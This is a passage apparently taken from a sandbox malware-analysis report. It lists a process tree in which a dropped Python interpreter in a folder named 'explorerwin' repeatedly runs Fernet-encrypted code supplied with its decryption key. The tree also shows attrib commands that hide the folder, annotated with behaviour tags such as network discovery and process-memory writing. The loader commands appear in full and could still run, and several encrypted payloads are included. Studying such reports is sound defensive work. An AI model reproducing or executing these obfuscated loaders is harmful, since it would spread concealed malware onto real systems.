ZZx4CoHoy2AUoSnRfAa27sVix41A-r3OlEZTfWH-gfDOLuMloO66vY2aDsd_ZVwkWqm-VQ7JUaUn42ZJ3OxZdq4kQQD0zDL5tZpBz618rKfrHZz92N3twI7F3nEXE2FfvcYbyKxfsOB47Kx3xxKXEiytiXIaffzngpKNC4qRU5wOh-Og9JW3hh4K8EEiQoEd55e-JW8-6xJju4LaKWndVCK7_WAZf3As2_uIZcUdq4HqjVqs8LBKRq_y2peaZJlJ2ErkV1itdyth5V-r1C7B_VauLcdDILaU1TA4LmbLsSMPe0DgQa_Zf6K6VW4YwsD1XXJz70E13_oMBM7-8nRMRvnBZSftn48wY2ISXILcYshnFWEhoPGpJTjX_VSe_kiE6YUnbMYo6lG2yid2Wqu5RQ-h4Fqp0S9RbONxeXIBZv4txZ9KsNvj9jJjzqsHkwzD4EKQ1tAfHx-KSX73OON7eP_cbGGn5uydPvd1d00aNEXVhS-ur9FN6Vy-Jwvjn8qXUQNLyLqrgBniZIgaqozrmP4vMCa1b32u0x0pVQrsjdqoxezfI6ZdvyfXF929_Q1ol28PkjGjdw7PgutbhmeuYdHZkWtv6BLChx9Fv_E8NMk8fItLWl4PIgsp10J3EPnEO9brDke90zoHlGVqFrXYIRWjNmx3dv-W9DAV6jHvigwEngYJFTHcPss-fEN0m3xQhk2PZgm3ig00EhAEON8U9Tg3SwEa1T0yydF3RAUHFEmfHAYPf0hOsQkOcyTh0URorKPvlo3-nJIuyNDiiroDfopGro_NxPYXS29usLT33PmFNKXn7I1ndABA5D7dytTkJ5zzw2aI1Cmxlgd4XCnM4WF78qv7jyUuGwiSOF5XLV0DJWESWHWdpE63uD4wgW4WHdGIAOv952DRiaDGxi_Bv12jmUzNf9H8VN9Ky2auOY_nJf70Z-woqqJD9MVesgiVjTnLYUbtEpCOwxGYSCyE0fs_HQhjFKKyzANf1XDN1RNk-vwnQhctXBLHJFUUI='))"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:728
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'uxyI_CawdzHc_-f0v31N6RdOhmPceWptkt9gJaHBwxU=').decrypt(b'gAAAAABmYRtbE3kDvZg300aepsUWvtGVCRp0y_uGbRqGwdV1rlvJgSyPO-cADNrX4D_nLAnBKx9sHQEeWCYlaPN6iFFWNUj-Wgs8h8a5ewhP6uv7LS4u0mQVfQsyuoFpfDwz-BfP6sxHi2gsB2pvT-RZvanf8HcC7KVJiTEyxaqOPycTWakVWSw91xNWMZWkfBbZL831y3yBxR3V51HSG3h1AyCW9osw4FsvH6bZvK1poaui_Z8lwp3c7wkZc7P6gnUKjXwo5jly-5GBet3847b4ZDtmTKJ9gP0MCh-rwtKPOL6hKK0_UE6iwhm4rq0DZogahI2CovjSaMY7GuQ5F17hE0Tc7UUxD84bjf0cdhQ5Dlmo41ETza572Ug7b1-ENxv5EDJeBnahwvQCnFqXIFB2pzvAQDzQ9jAEvY2KFm-cLdfvz7e5hSlcngS1acKMX5kUDC6rPSS1NFeRws9f165HswMC0xcbRL_hq60l19lMI4MSc4r4b7ugweDdnj376DQRKZeK3G35T3OpK06IN7Wm9M902osxL8z0BZaBf0ZoeMueTgHOAwWzqybauZZgMyBAY-0eFaj1PAmqZQMx9oanq6ygJeX3ogifwcxIo0wUTIWYPEEO8B7TjAsf6P_-YeEjr6GHNTyMwY3sgUuJvXfimaPKE02Ar0uA2kfYMTVMSSKmS__1SNrPq23VILw5tW0SfZQXtVwG0mhBx7yjb_6H6O8gY8fkpw8KGtbvt3vBiT7h5JCxQwFdB15FejxobU8YYH6MJJSq-kV1iJy_9TeVC3hLZE0Bu4zs-n83hXqoIqXHKHaxxTk-0cmxA6QgwDC8XXUQVeLEaIH0Y9K7Wq50lYntqZCObq_PuYW5a70qXo2wuzwYqzO8ZGRkHhp0nbu6U4HGyVmfbXgS9BTEJssrk0K-9GwtcdQMPkrxz3BJ6lyHsK5aT1534trR3gPzSQHNOjn_ie9TpDQcNNj8IAUFr53_PVGHqbLc3p1hPU7RDXWseYytjAAXjaR7dbod5Nxk6GCDlGvDxYq96j3n2mwwpUWzdIGklGMnCeIwOMrB5ht6Hr25qis6BWVObfXLNsaRBYqdaViYCL0ccs8pKbfLDH0s5S81hGPYY16ub4ysdVp7nBqZhTkKJR785IuQeZJYicir4edc3EDDfMKFJkAtoy5yS0vrOEy1hH6LL3aw3wrsPC5Xsc5YhtEyRulOfAjxtRBEhSpLr-ekgj0DZz16pFZ21LRJw2_EO0Unf4a2_inh99jQPuHBPlw6TVKSn15ncPG4q1CdWBWWdDMtDvTN54unD5iP6DBvGQqPwOGJ5bxyevbPF9QQSamGQRwaD2I-TYgj3A_9sZ60CiyclM6dVOcnpwL8lVLQxwR_3M3LlSvDwFk4G4JTGD6glQJo-Yk7Ji-cu7cpg6vepC1OVvZzWn-rPHa5Jt5isLSgYM8Gltc6TaQK_LZrstI04HO8g_Jt--TCBDDVopoCTnBXoPX7lPoxvyR2BX4SMixQcGpthGtb6KpIimpjvdyENFetnBR-I-duatYHNDaqbjPYdTaOAoRLePo1pk0cDuS1UuCX9Gtl9zAtnwKk4osngMaXaSNsTXGHSbHDnxGKAUPVfv-lIciN9Oc_jy6zJLm1GgeBMFhRbpK_cGDwiZJ-XgzVngR25vDDzaN5zfxaCOYLI3ZKoJPX5DO-E01d39eHx8E7XlJggvEtIPG2OznbnrcXZJEKzBPo7B_U3FxRQQMttw1aLb91bqOp-ktoIC_WERDWpqqQLD1WH9UO81IoBlcqx9ywZq97JFEG-nAVo61U7Tx9oS6xYlvggPhF0gZ56B1nfHfccrHXB5rz3HNxG2xIR4E7S6bgxYZN2kiVQrVwO1QO5uRtHt9EJeTIBoDCN4pFug2jn4EgSRYlumk7bfm6lj0sFjrMbHMvWUEIcPkItJGQuYts9RlnO8Vvx6_lOAsS24pgiXSEka37B_xbT_YmN10G2mP1ds8TCS5JRRlTDAoj8WP0BmbCGJjWo5wS3-9qf3dggtvaXTQnlinUSwthgwDDik93goLmj9A3k2uGGp2VHkIHuF8952EUGOPoYRul9zx-xgVDPYC72juQmq6-JvIvuIV49oHIe-uH7nZvejMcE5y2pPTTwnvh0ieapSJS0HO1hiLOnxN-y8eTsZSHevJJQX2vM6FI-ZEeBPjU6NuyXmxmJmbNLk5fIuhFYZMfDAFhfp70amN0LToIxWkCgp0B8Rlb6JjbKlwP1gjJoPz83swcjvOBLIhZXxWrWMTr71yPWPcZKz3Sg8Sq6odULwkFfxQzP9es9OqiA2pt_tL1C4ThGh_mLGGXUHfUvlz59bdTYXhq75ZHmFjAiZsXvHSgOYnM4PfYgn_qANlPldkp0SCKX9PZr27_1-Gr1Y7ERTB3ft0Xr9noNBmJ1H_ku0Fy95Dx6-OkG97HocgKmrFZ-8uswkWXd2hB6OPd3_RIO4tZf_MBvLE95Sar9Cmb9e3aDl7AEiiJWK412D0ZZ4rBhIxwJbT1qJJEMxsmk4l2rt5dVkP4j7n1zL-UH65fvpAt8ai4q_6Uy7fjpAJKH5Yy1Tb6gFPSP3njmsMg_v-FzxsViE3A2gVKlcOaESYsIg8c7PkUBbQ2dgEGVLYvufhGkpmEhVAI4a5hwGfW2wAMWhUfCYtFRwIhC57Ah6qUy4v7OHtQvhqhoNiIlDi0o3D5uJc8VPq5ZsCaxeGrB_aMS9ZwfOS5iwzRrHbAgGeA2WWjJVR-U28LjpDne3LzOX3MxVt9zBsTdy1z86W8MFTOTT4Zurg5e9hwx47aZFxBnqcnYeMhpJS0qY7JWhF5ZMG406uRe6Ix_cRiSkMYBlo9UvYw9wZjU2Ed6l4IYHYtQU6ZlNE-6-a35xLNO8j9uEGinCN3C2xRO_WJfKx-hxHEwwj9hE6JWPG5lMVm5XjrlP5Aqm2QS6Js8cwcuad8SkSs0U7vVpwoVCofg8HVAmsmHGN2042c5_qCv5axihRSHeMnFeowq98EiceHg6vi_rCLiPBbJemL9aciTGxn-f6AjUDzmRLWbklzoLzcXpa22hRGeLdGupSCnlPBPb37GId_qigIB1uuHWMXp70nmn6XN9ek-OOtDWPQCNOJhTc2QE6nYC-FL4FM2MKpN2_ZhEW9Tg3KeNXKKRK5JdX0G1dOiroZMv29SWDpoE_8o9u4wb2gvNKJvso8bSxTmMBavUaZYkG5TcXIZ6WbA3J8lnomMgdMl0YkKzVd6wwXPKSMgsZTYlOx16hDnqsQma91WchBOSVe_kAcSfHShUGPt23mDQQoZ2zjn9z0fUW69GWxh98pSszX-Xlwcp3iqTXi0xU4DlaG3OTQBlvMHqiDVgl0WdM-reYy-bzmIJNQxA3gBISQo2SchyAfrB86AljoNaWZWBFCE95cpCqlRrB_QFE5jrk8hMnKLrlxzRcrKT9l53CPOn-dFhLvAx4Pdq31_ZXAo1DXgEP4Rljr3oDsKmltxXbV0ay05kA3-h4RE8fwiVyzmGbdsmHNCX9Fvg0w8VhMeAJbZyDtA847MVZfUsA40o0wD8ZQuehaLEzbb8lxTQVM-H4QBOWUR19gl5Xh_3D8TNbEpbVXR3BlOYHprCczqHA6jaSELPHhQ99UT8ChjhpjRtBpKczsng3X_Gr8lHUFQoxrd6O8THKlS3Op2rPE17YvrD2A8wtgqHyoFBThPnv8c7wwN-kj7xIkbBn70J9IX_IZT2ZUjF17W8n6bC1QdgoL8cNTsM9hGAyBnN3DGwcwb8fnIyHGNRezsT40hwE5ZJDdo6ekjuCX_ZTmB-zw1ApZu-cxnwKaGHXF0GhxaQiNhiUbyT9Fyv5q1ZbPRaHG5n7GM_SxonUsMCjvFTPI1G0xS1qThy1d8O0biQQT_uASBsaToRJeltFX3Yr6CJn3R7e6SvPVp_ghxyDGRz3sIi9rOn9SJZknOPkyicX43RNUGSb45NHFzozaaXy1_5Je9Kw4JKHB1hOMFZyZHCZSDqZc3GUgs4DdL3vA6lzDp-Oz_A8lSDM1qvm8T-xjceaRuW5DzPlQAc_1msKyIsp0DViuquFvFj72Dc2iP1L5S6MqTqHCcUOik0y0Izgn3KTPYNhlNZ9ukR2G4hZeFtdg5FXJOVqmYbgwjk5jwYQt1sog8OCg6fwc2AagkzK7bPCxDzQVEGdmSXQZHj-GNxzts1pL6MEMzRyCesDoencuFQmqBuyfpYfrlcyc087sq--51JoCq6dY46OGizociFRYyDq08jo-hua5AQaohnvB4fQXJHs06fr2xNBJf-FHlA9dSr8ueCAS4rl8GYecXC3QOWcXrw-F1FPzcSlFzu2-wMxBBVB0_ZrVUs3b4zDR_F3wfDNsUqSxDNrdBBFqUoPLXf3t8dVNwoK24y-b5t_vFgJlvqybkwkxItkxBVEezJx-OoiQFe7H9G4WNY_6e1r9YY80WdJX15hDLOsyZj2qK1EvktsQ6aYExJDDdjL5CjtUTLtDx0_v-NEJY4sNX__hCPED7Je_Md3raLXPQVBT-Q2QYUhFjYPE6UlRl2N9YQlhqKVxg_uTaRpdA2IUkJGMhoDb0gtr7dYqb-k2NbTsznSZZ5ID1yQNGK_EMFqryrHE3KfqiNtWZ2dNI-1tyGQWkJwh--IExKtbrYVBS37CjcT5giNzxtGfEU7jwEiT8dDuKjCighg6e9HeD3KpuQkilUOZcbKtLb7FfRE32AROeGoDsf09GeqSzf0qBI_q6uoIQjTq1YUU8pGymb2dgri2fZm-waKiVEzcacPu0fcokPWcGtJnqc7TAo6blFDEnFNiVTAalti4qOxGjphyiLNdctcEYBIO4oIIviv_OTXZLiAGyYvTXsKG7htqY3l_pmoljt2Am2KlM7knnrO6Wyvyj7gRUK4x8JlVbLEVCDy00ScV7mFVe9e7BXOjYT8KZuIjakeBn0-JEJwZ_ushgn7DnCBAvaf2iiX73v1c_JNZtidLFbx2LYi3zfMRWUkliDEeerq5pIPLBumUM0fo6ybIibgJYLIUPgQmBweNQEt88XI6zYUh80McnHc4NlUvwVxzNyQFVPcNootchy5ugv7h6O1LF7Y-oSLljbd8iO3T9fiZrSsBsrH82rvAi4Sulmgq33l4aAJ3daR8gAK2T1Md-nB8VO6xPXHljJ6Rdtkj5o2qVTiK27zO_0X4mXHfYHDz6i76Ga-X9GaXlh1w7QGHDkqlmqvqqztp4qB5d5YbSVcB_13onOPCE-AKIkvGiEbuKLMXYE6rJYxqTrTV4IndJ7qBMnhGwkUSQhEQDciTRUTYpsMGDDaGoHi3Y6I96KhOEkGG-UpryaHIYeLp6KVZJhNglaisDWJaiRIhBAojrX2FAjIsbNAHcU_zBm-3OiwPyuXAuu6ZDXp4us63voBJyGNu1u_3ywhumueM98fdkRsnYKJn-P_eGAs5IOe3BBw8iMFwBHimeoEJo14Dc5cCkl3cPVWzlWztH3nWIxXLvbPO9MtNSxwFqF0m_D08iIb5SwFU9Yk5a43DyP5xboFYXz-viRCXvi_nVvsDNWrRMEx0EZ45JqHNDXErfpqEQyR_HHsVodlt08Zv4yTpP0j7eaL280gnT8NMAUMAEiogNCOFmJZ2qiqxQS_Tc3TF98_E3cibQv42rPSybJ4UFEByK1IjyFzZzCylW4-1kCvztFDuSvR6bMm6cxubmVoU9wWDscYeYzl7lTX6ByNi_QT6eUoVgySm4b_qsY4TSiPQlYOQi1kBn-XGLuq9KpCPW8Q90vfvkZKKwB-GLzR4VBU7PvZr_m5XQcSdUyJGclMvmfm1VBVvEevFTwYZ7JmgTj15Hp1-2B0HMgRpDnEnbn0NeUkG2bwcdF8uPqFyhxj3nxlu5Yzk2EWYOFdQraEyg98xZz52cBU6YFmYg9osLQ1--T_jmkdPMNAJUAnorB-MxRtBqPsoMlZ4DIcIaXuWrJxsb9i3xpCQdFuPjsvjAMLsxKCQybzTa6Z34SzFrRVB17kQgp8rXVkViWtUhQT7O7fefR_6TSoCIk17vYo-y-vk-Fm-nJja2uHH7nGLLsXa7VAWYuMyIIOdTKAPKaT_B9f_VtZgSXd93WWR-zp-jSvtzctghYQq8IKnBqnGFNIiG9Kee968mzvg5P-l7oVn1XmaPRlU9RpITwAR7yFwlYqv4MN6fKQqaxWNvvVPMMPx0z3sJws5mUL5dm7qM5Bs0Ny1bAR33kghRMXei3O6vRq0TuGp0u_vnSZheAHquLKQYqpPlPsxp3XLPohT1fjPK2lladaaKRTnL2WjXjd0uSzWh0mSx_gfbU0Xi-_gUS7cRQ8juuK7dccjxQwIp0Va9VguyhVz1e8x1vBvDN_y19a1daAEXNOAbOaCB2YdKRL66_gcMDS4ZvpROGpW6Yyn1HMrkVT3ZKro5w=='))"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Network Service Discovery
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwin""4⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\system32\attrib.exeattrib +h +s "C:/explorerwin"5⤵
- Views/modifies file attributes
PID:3620
-
-
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'ViriKlkg22n1ztfawqmpxUymLAlW_I5_g41x7FLJOnE=').decrypt(b'gAAAAABmYRmUseFMTSHeK75BTYjbbQl6P1slqj7DOSLUylY2GuS_G-aTGYEifUWIZQbkQYXXkIaTrHx0f0yJVkwhYXcqFNDluYYMBaXOfLaErV3zkW1mpfILNvIFPZIvTfViKKv0MqvL3kCKWlKLKGdGR370BwJMaiXIKfqPBkaO-c0YgsX2Ot0c5Q-Wn6PPsxE4Ih7WE7N2smYKjVKMKXuepZqL2PDxcFGSCtutZbui-8ebhnJv4eFSowEEhZApoWLZR1TRrUwlCkVnXzK0FvcgaO-LNjc0mzbHfcs97-QYTJVVB90sr8jo3LhvSbqfhwnehJD-dzmaD1YGjgpKbZsjcgdHb3EBytjAPWlOD6S212KxlS4OThk1Q7L7WvIQHM1ctdEZWQq89ktF9gug0vhoTfYgV8bY_nu2OGFxrVkAyHhYH6GUco-LABj68EVnjtAZyQdVxYi0wMRj35rnV6l5_tqQLbbelhEfIUyd6fT5caPsvDo_8g_Wh8qVT7dH2Nu2U858GMIA2x5RL8S_Zu7v6AL5rSk62lv5CmRTff4LMzMvWhJqIUnmyZBIdw2pZKhhaIev6azan5mEDIzxGBVmw5AZ7uYtaqKTLfZIQeOY0sqUrKNPtewy-dM1TrDq5eL46bfj9OKIS4RSXaaLYXlEPMvt52fgCUzXGMbLAXKa1LbcQjo9dWejBpLZ7LgwvNPEeuvWssRgGnzeBJXU6qRy7gIIZuqJaMSwfp4JOK4k1QJXt6DUOxvf_xFR-w90OSQ7pgpRZxOqmvXccImyhfISz2xeW5Lir7v7qaSsZXUuN-QH-d8A0XePAmvUHnwDkDJB6wEaMMD5yv5j9BwTo0oj4IjFzo1QpxoAdhF0iPmWwOFquyghgb5KsOyYOViTMM__mA-Pjg_z12UnsxyvpkWnuT640UF8ht4Yak5JcKIOKdcBZCux70sW0K4jKDOF4dgicGAExRWWODybG_saRcvQXInCsInsyr7Bt2JcwkmsaxS9sWe9m9-spt9EySs6BOX2iX9KZ45CGrh0yzLlzbMhKgDjy0hu0pjX1qN6-pM5h6rVMGAMzGvUVeOicM3KOQNcq5siam2eI40mD85wlP7HE5AVk40YZtC2JsRKmRSIm167MIQGJyi_MZhGomqVmGYFHUz-fRY3ebN0OCKONbldiKQ-nSg13B3Lufntni4Ms0FwcPM1VUWUNcWpA4J9cUQohWrhQ1xVIaMd_-eLC1ymUfCF7iVLQ0ucJX9Meyh_h2RjVrkqUjDpaEB97Tc63RKd32mnbz3Hv-vvjyQAoqVl_fVyZ4MD7XnllFEf60u17tsteIHGNK5AxrpNuk42XRKJ8hpwjY4V7ptCzboU_IxAWIkF6Tal_2e_u4ac8K3bmztuXknR1x50nOfpKN_Gk0YYYwsUO4EIPi16z9bvjry5vseoElLTfgVMfAJpjhGIc4LMeuGNyWqHDEkwKM8mvAQBdXYzd3VpoI9ljmUwhSw70QsXIhJgNzfxHrH2ig418FeMyl7HqD2kI8W1pTZT_RKISnssWOQp2Nnvt_BBgnzvxcnDG0QhkQeucsEbtZeU5TD9GrTTFViAILurTZ8gH-jc-O5nfdlQfSAa-Dp3zHybJMGsaH5kznDbJehWJ2TGwU43gglkTDh_VDc-dqXvenOGCKQvVUYe--oVrGqoNaMPXXRCSkNFCf3ncZ9MZH4hDQbGZK8Id9jhbm1PIuZtxpC7pO_ro30ZWLcQdqBfkLvn0-lnEOHIDWYrW-DN0AoieuVyMYjB4yVf8HxGUNdS8OEXkhpd0rSpI0aqlARGI40OyLDpDJWPYncIZHPFWzJlJnyDzVuV3EdfWCRzvcCknOWRNEsRVzeowhFAoBavMcvqOG53O810RkswWl5Jpd_hj5UfrmlXJg_igET3Xup_S0pkHQqCqH9hNDsQZEGGxscK0VArZZ9AL22TpZ8Dvtn9aeTEKyvMoB5MXyCvhNiN5r_MPS88KoiPHUyjK0qvh-GxaU--FCRXInPjhVGIrF28l89O81OcCXBIzzFFI1aUafdrdHt0ltOl7arb9SupsD2tlTw_OyvyVUF6THjUworoWaztg8h0SJYBITypk3xk_0rW-U6g1qeAbjKBfoK6rCgaeR-h1gLYa4PaL8Su7HsZYsUpaSoWTPhYDwRzj_grJHocL_qNFbtnrcgSaGHLUV_UN3RPw2lOwCquh-ypNg7F9A3Wlxubeqpjc0IwDLLreC6QYgBNaMO5HH-XgjTKhF0Yt0pKestIAPLVT3Mw4spK8v89C9w57QzH5tK0YWRA2FoqsMSLKkF0QWviycvxoV9h4WO5ibZ1g7qpcj-uvdoaaK8jroybv6ZxKifVNEMEzRTSpiFcgMnx9tC28hZofxxmKudllW_GUdYqcgX6fP3bw2o_PJQ86vlCDKtYooh9t3ckleK8UxJQhwr1gEdoFgaYKOVcK5VmU-cqrKDY7S9CQ4AhZh3vUPjTBGg-YqCuftnQ4IBgDQQ-GbNDhgzOPZ6vt9XtyQvm9Fe7zWvK-5ZVnChPEXqNQRzb6aElxddLmlfs9yPLZXEWBvmAqLAnmk9d9T3or9Se9bLjvPwWe60gFg55Ec-HKU4uhuz_suFGI3yBASgDnPe9nh8CJkki6l18iJlZO09lOaf9R0daRRECChzQM4t8vmBFKSjmmTXd-gK5Zl3DNyj2sszVJDkHfGSgq6mmN-1SXsxmSI0DmFr6juDVZaQqsqbc9Ia3lRO6D4ay6SUQ9sJQOdU6yYEt2kPzpnBRDi7u9Hf7Tylf6LwK9e8m19dQ6FDdBQ3KG3AAWRuXzYFFo2d345CixnFWi4H_wMyNf7gkir2hAajG4vMK_QZ60WSMG-zviFdTgYEBK3T7Lwp2ZXcRTXd5IC3awoH8I09IcJ8dmOT4bgb4-wxJ5ceA782qftn7xHzXIxT6hnCuybpJ10OV1FAnf-ZnUG_GoColMRHTIqKwJOs1XVJ1vtpYxxzRaT9YP3C_tqnAwfavBDLv5xROlLQ1yDHwukmLslufWlCta77CSwmS_TVvDvliNp-IlKe12cITmAJhCBlCJmFE3d2JfqugemjEj_iAKphMdpbdpGkTau1Fo_K_LjDhrWRa1AcM2vQ3fu0lmbQfYztSZZb5cnaTl770F52nA1mr2RGtoCEqDltsr8EHrvNl6K1ETV1Ut-wKWjdjsTx95OBlDroqDf6BtoV7UysetujdEUC34FUy_yeyrEBv-q5n0OAsoLq52NN7vrEf7b_GS-k3XBQCiXLNGdCZLrFwSdpHq-NyGhL7O3pjfmDeHufFjRwugLvAPi5iFE8jsM6u8olDNJloQ2TEd0ewWqmO5_GFStCAyAD2V1RS3FvwVqYR8_wik7MNq2vrXOE1KWM74hPAvnU4v2UpCa6UmSBgyTMO8-dFkq9I56tx61LwNLqx6I1vwuOeXJPEllDQfCz_KHRk6oVXXs9_vvSlSbEaTzwVb7KSWUwB5kplK3NijyqO3xDLEsnJGqssw2U9DEBd1mmFojlECNEfmf3B_vaIQn9UHRHN2-y0Fgm6qHNu6eZkwuassVPZV1v3cWqzwuFY_qLc33JjIqtL72nzK1NBsnp2m2AtNSWsAmAVeL8Y0eCMVGKynTOmx7Da3cS0PqXXzfR4JrbFmUV3rSLLKPWKR4yBZENPAChH1dtlB4BCsa9er_gi_r9PppgUVLZ2L3FcLIm8tlksH56FSNR8wY1StHniVL_KIcLsSRYGU2RZqT-1IH3gpZdjqH-jlkxxErWzZpyeRUPF-RNcy0ZCuT_KfW_qGCP-901MDay2Z2yU_izrns31laTa6ir_Q_mLIw4pWJLSFxvtjLnZJfKdW0aFjLlMYJrgGv3mt2_QCCmysvwYOJfImNPvO_VrRc9-uXouN9TW9F65IYnOtnxN_bNYnn0ztGu0-Y43XFrdqftH_uk7s_xoPV3R6WVo4kKdrYQSbaek_SlLgaNliSzKfrsl1AX4Cu7NZyKxZ7qoVdOAsPgupyfCwQYNFES0GyDEBe2wf5eqOh-XmFSNL7Y7LZnVrqb2GcueHB_DCwWCIKVYqjbdF4ScWVa1TsqdES5XIZpaOmEOTNfVGP7nQg29vqnoikJzn2l1IDxs7XEMBdQJL_qiknzUlF4om4xP1kLFjZWkFQnamS8ccF8qQtDEO6CvHovytAnVVORtRjqRfE3JC2IpxFdtLEfWrqBueDnFJ3-UMvNvFcDpg_O6zAassTEiz1rrayKpX6kfjV5__KXArvOQIfIWSq35YCK8HfsGsP1Z0_C1ryTRdrWaqABrVnIovInaG4wQai1rXD13oxPzuoSniBMTh0MgEARPX50ihLScGPGzIT6J6GJjG9HH0x_Tc-lkj-52Blz-wwE2n4dkNCe6Uga2IJiLyV-6OjVP-VoppPUlDvD_Ywhkxe3VPfaJ6zj2O5AzdzUyPGZI8iJpuMRtApcPUds3E79WgehusM3PoDkIH-fB3sZlbytBD9Iv4GImj5aN0H5xnGO9nCUPa3nsb_NqEKpcfuR1pkFfxnVUYznH3T_5ABxj8RYZgJ_3XHFqS9rpDep9TcQCU7dFOKLoaYr-ZyNhZxoOqPINQ1w5mkm9sxG0efv12UJu05uBjm005XECs5qmYYOOLC9ryOwkhMDaUEzFZaOgIGN4AEKKBX3FsneLO0xZFg_k5e7ifYpVshzcWXTIfNnPzdO6noGq50-Egrlv0NXp6nwvIKparzEEcghJKNj5m5KTiRC_jIHdRdlqKfPt791-HthSU5OZnezee0WL3pOUR-5HhqapysWhnvHVWAVzyKeMBRv1GOmd5QVS9zyEw52MQKTENmZ95djihvVPheMujGqYJ0rlsPC9jUDszJXhQAES_I3IixLJHeReeksWzZR7ASxiJ2ljNXvKSQK4iOsElwTP0MKRibQUQ0QtfHVWyEKy-SM9qkxA7pGLvT1yhoUqqT9SQ2pZLjRa4KL5A4jOkENRXlEq67s-hxD3SA6FZFCP08ToN-j0MP7J_Lm1NKfrz14pXkAJ_u8qHIJCE3AJJKYYpedbYBybz7Tq-Oz8aHTK0feLTh4zSs8CT2OnT6rS9nR2KdGRz48S5hFJjFm5LtQ4wJE1ibZTjPxJscVUtS4hNGqIj8s9LsLdhpvkIJVMKgSDdo6piNWSnqpHbpluEzvWqckkEoQFDO8pb_AIKA1dMz3iBAxSBaGSSO-x_aapN3m_5fB7osu8MsWjpJx6aSeQOXtOSFEGM0bQdQpfUIBsgl0saaPs2M5KyycUqI278171tYEyX2Fp1IQPiOEMiLe6MI5QP8koPBQmHlQ8HgROxfEELcWPT4YczsKdpz_kkrSx26yxlBQaKISo_jf6yOQew3kweohpe8rCH1Je6lWgWyN5lQlWOLlnH0b2HCYfUZQZnsYoV_32TaNnFRUqdmLFZKgn3bTwoSbOwTiJx3WGR2aZnczkFmuqzS7xxWqTWNTMclwLHwHgPIQeHQTg7xTgWoW5t5aZH6SLs3yHMu8bmdaTK0Hu-w6voig1Kma5sFrQbJZR9QBgQANfJRVJV9cpReveXhML4vuVbqptw1kJF3Ob9_h-U9x0-EUXu4BgyWeW7_fBM7SeuNicTcLunWFD2AKDxIARIm-G91XdNWRgYYMxGQqrs7L_V1IMJNH6-xG2-qChZE8cwb5KzGt2dYSsmI1oNw60dOc6gAhXeLNA80QjjNL9tV2Qs-Fx-oOhT6qUdk8xQ6ra59iiuzZbCUAzjkMLc5-2oKQBZrhV0gu2iQXN2OVGGimFxeHbahGmITpR3fBGlvdkJnCbOiJAMy4vYJKZz5qWCguFKRw8dieoNCAhzcVZRQJPK0k9yYrNsuIrLhg4obTEQI5gTab9LiP5mowt3EqZKPAwMe2Ja7FBCLLqaEjaamRgZsZpsFplACnPEFi--IWcWSiM9IKNmZKOPT7nLmq4KpDOQONZ8dG8sbvrnryaJo6q1oDNgrmDqWx02sJ1D0pp78GZepBEyR_rw5i221lYb6ooNf4OzCzTsrW8KmoyxLh5QaNfJpbWk8vsD0eWvoIHnmiWGJd3qit8sIVzKKIcR4uGLnwcx-K4yKMlJI33nJ1Xio5H2IFWbanSEsC8gyLyDPSerJLKz8r5dOjWMaTgCSsONEly5QGueI0CSQEJDuQx3XLTjojQnklKDJhy8fKbeAf1ZXh3rY60UAbJ8jzKcauyQx3XpXMoVT0ZLl2ZHVYHKyG1OxJVN99vSgCSFjnlH9kBx3TdryrdMSpIYB9TbbUOU7MBM8VFwM1TnYgNnSJ1WcZEQq4SlsAY5XU2fhtpOnyBhvA8mrbtd0P-338dDsRIW6PffEfgzUV-ej9LGWO2gJj4AnjduXzTyejtH4fInjP1mGYv0jwQaVRmvnzTGqI31WyzI-2RRKRfJrNRFYqu2Q=='))"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Network Service Discovery
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:/explorerwi""4⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\system32\attrib.exeattrib +h +s "C:/explorerwi"5⤵
- Views/modifies file attributes
PID:1152
-
-
-
-
C:\explorerwin\python.exe"C:/explorerwin/python.exe" -c "from cryptography.fernet import Fernet; exec(Fernet(b'PFEb2Ao_jLL5_G5rAQ1I7A2BHguUlElphEwsGEaRwj4=').decrypt(b'gAAAAABmfoINJVlXvqn2brsvCgKzfkB-g59upowhKnCCk52XBPXnUmVptfmoa6iIO-klvSPReT6pqVUXZMFf0Aj74ex1plnzU3BuQ6ezkTh_Mdrm0GS7K3f6F2S47qvHkLPuANBORie0cgyH6vPMILeyjPoiS0mBuJHDl36qy-2x7p8rkUx37BtFbZY8lf8V3-T8JQoo-SEIuGAWvqdZj1YunvT0czyL4aTPTx7WI5JIEMuVZHmigpF7dFL11U1fBG2q8dq9tpZVNL5HP_Ar8QdQeqwdbosftfU2nyEMigWIxgZCOm5MX6qQ6SyH3ziICr6GghRBt02k5wTil7tWNzfGr2oN4se0XAyQ73UwFpq4uPlmF0plfLX1XFp7FvQzv0iZEE0oEx2-MzYzIrw7PBEROajIDXoX5HaDNgHT8yBSIRaYBpzon9W8C5XP9A2hPzyiPC7cmtj8DJvSqaBQ4CUyEyMHMetlv1lDTvsmFj8kvcFyj9QRvGax-ZhKCU5eLEtxIokop02P39ichBPyvluSS6G4h73pYIZGN-AAPxvnDn9rPxy7BZLJ2ev5aBcO3HWpes2chDDoSqZ5uQUUqm2el7eWRj75lZPfToAlD2Wq6mvZOuRzkczeEXQ1PZ5xaz_MF0kcJopLBGCAgiW_TyeRFVEqyfxtaZIeGwKFebVNEBJjT92_PtQOmsNVx-HLS3pgtvqAG96fTrleJfb0NyS9QR-cNvNMsEihEIrlQiaES3jy5bkLYwClMDdjJSXOuVCGtX4cpZ4AgDEt9a9a3IlNQnQBtjWhgM4noOrxkKwP2rRu1-89txPqGt_ZHqZnJbv6647UoNCtdWN1otZ8Ge1-eNM1Om4gz-gnfYV4ZqDoT7LEyUxTA9tNMdUVI8kdg97bEBh_ZMUw4BFATs_qiS2Iidi5vqePB0tt-UpI1lsEljUSqXNpvLErSJfWHQPXUhB60xe-vL8PNcyFjN9dEz1ffhggaA6bwKSQ4zDoHpMLLLXxi8gVpzczWEgmP9